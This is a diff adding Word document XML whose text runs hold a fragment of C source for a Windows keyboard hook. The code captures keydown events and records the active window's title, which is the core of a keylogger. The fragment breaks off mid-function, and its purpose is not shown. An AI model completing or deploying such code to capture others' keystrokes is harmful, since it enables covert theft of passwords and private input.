+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, WPARAM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, LPARAM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GetKeyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NULL);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == HC_ACTION &amp;&amp; (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == WM_KEYDOWN || </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == WM_SYSKEYDOWN))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>DWORD written;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>KBDLLHOOKSTRUCT *</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = (KBDLLHOOKSTRUCT*) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">SYSTEMTIME </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>st</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">CHAR </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>moduleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>MAX_MODULE_NAME];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">DWORD </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>winID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = NULL;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">HWND </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>activeWindow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GetForegroundWindow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GetWindowThreadProcessId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>activeWindow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, &amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>winID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GetWindowText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>activeWindow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>moduleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, MAX_MODULE_NAME);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
